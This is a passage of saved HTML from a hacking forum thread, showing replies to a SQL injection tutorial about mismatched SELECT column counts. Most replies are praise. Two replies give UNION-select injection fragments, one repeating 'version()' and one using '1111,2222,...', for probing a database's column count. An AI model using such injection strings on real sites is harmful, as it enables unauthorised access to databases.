class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706&amp;replyto=34578917" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid34580030" id="pid34580030"></a><table class="tborder" style="margin-top: 5px; " id="post_34580030" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-12-2013, 11:51 PM <span id="edited_by_34580030"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;pid=34580030#pid34580030">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1847579"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/dragonbyrd1.gif" alt="" height="72" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1847579"><span class="group2">sweetoow</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 28<br>Posts: 336<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1847579"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34580030">yeah i did the same thing, version(), version(), version(),..<br>also learned one more thing from this tutorial.<br><br>Really Great tutorial man,<br>keep it up and thanks for sharing knowledge with us.</div><div class="post_meta" id="post_meta_34580030"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1847579" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706&amp;replyto=34580030" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid34580053" id="pid34580053"></a><table class="tborder" style="margin-top: 5px; " id="post_34580053" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-12-2013, 11:53 PM <span id="edited_by_34580053"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;pid=34580053#pid34580053">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1852193"><span class="group2">antibug</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 4<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1852193"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34580053">I remmbered one of your tut:<br>sqli+union select 1111,2222,3333,4444,5555,6666,7777,8888<br>I think this can solve this too.</div><div class="post_meta" id="post_meta_34580053"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1852193" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706&amp;replyto=34580053" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid34580496" id="pid34580496"></a><table class="tborder" style="margin-top: 5px; " id="post_34580496" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-13-2013, 12:33 AM <span id="edited_by_34580496"><span class="smalltext">(This post was last modified: 08-13-2013 01:23 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;pid=34580496#pid34580496">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,154<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">213</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34580496"><blockquote><cite><span>(08-12-2013 07:57 PM)</span>kimsonha Wrote: <a href="http://www.hackforums.net/showthread.php?pid=34576550#pid34576550" class="quick_jump">►</a></cite>Nice trick my friend!<br>long time I have not done sqli.</blockquote><br>I noticed that as one solver is missing lately at my challenges <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"></div><div class="post_meta" id="post_meta_34580496"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706&amp;replyto=34580496" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid34580939" id="pid34580939"></a><table class="tborder" style="margin-top: 5px; " id="post_34580939" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-13-2013, 01:10 AM <span id="edited_by_34580939"><span class="smalltext">(This post was last modified: 08-13-2013 01:12 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1457333">kimsonha</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;pid=34580939#pid34580939">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1457333"><span class="group2">kimsonha</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 13<br>Posts: 165<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1457333"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34580939"><blockquote><cite><span>(08-13-2013 12:33 AM)</span>ajkaro Wrote: <a href="http://www.hackforums.net/showthread.php?pid=34580496#pid34580496" class="quick_jump">►</a></cite>I noticed that as one solvers is missing lately at my challenges <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"></blockquote><br>Thank you ajkaro,<br>And congratulations, you has become an Ub3r.</div><div class="post_meta" id="post_meta_34580939"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1457333" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706&amp;replyto=34580939" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid34583606" id="pid34583606"></a><table class="tborder" style="margin-top: 5px; " id="post_34583606" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-13-2013, 05:24 AM <span id="edited_by_34583606"><span class="smalltext">(This post was last modified: 08-13-2013 05:38 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186">hackforumspang</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;pid=34583606#pid34583606">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/0fa0f9ce54eb150d907f3e0e35a039cf.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><span class="group2">hackforumspang</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Sardaukar<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 60<br>Posts: 1,869<br>Joined: Apr 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1241186"><strong class="reputation_positive">121</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34583606">Son of a..<br>You
 learn something new every day. I thought this was going to be another 
usual error based tut. Excellent tutorial, never had a clue any of this 
was possible with union select.<br>Thanks, friend. And congratz on ub3r <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_34583606"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1241186" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706&amp;replyto=34583606" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid34615542" id="pid34615542"></a><table class="tborder" style="margin-top: 5px; " id="post_34615542" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-14-2013, 04:07 PM <span id="edited_by_34615542"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;pid=34615542#pid34615542">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1873484"><span class="group2">pkerr</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 18<br>Joined: Jul 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1873484"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34615542">Wow, this is an awesome tutorial man!</div><div class="post_meta" id="post_meta_34615542"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1873484" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706&amp;replyto=34615542" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid34623535" id="pid34623535"></a><table class="tborder" style="margin-top: 5px; " id="post_34623535" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-15-2013, 12:33 AM <span id="edited_by_34623535"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;pid=34623535#pid34623535">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1263159"><span class="group2">Vivek_s</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 19<br>Posts: 404<br>Joined: Apr 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1263159"><strong class="reputation_positive">4</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34623535">Nice tutorial ajkaro.<br>Thanks<br><br>This method will only work when error display mode will be on.</div><div class="post_meta" id="post_meta_34623535"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1263159" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706&amp;replyto=34623535" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3687706">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3687706" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3687706&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3687706.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->